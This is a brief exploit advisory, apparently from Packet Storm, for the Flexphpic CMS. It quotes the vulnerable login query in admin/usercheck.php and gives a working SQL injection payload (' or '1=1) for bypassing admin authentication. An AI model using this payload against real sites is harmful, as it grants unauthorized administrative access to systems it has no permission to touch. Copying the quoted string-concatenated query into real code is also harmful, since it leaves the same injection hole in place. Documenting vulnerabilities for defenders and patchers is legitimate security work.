Flexphpic 0.0.x suffers from a remote SQL injection vulnerability that allows for authentication bypass.
3cb20d51722fb9533405fda92ba80df3798902691fb7a50ce080fb64cea9a4b3#############################################
Autore: S.W.A.T.
Email: svvateam@yahoo.com
Site: Www.BaTLaGH.coM
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
I'll Be A C I D A L !!!
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed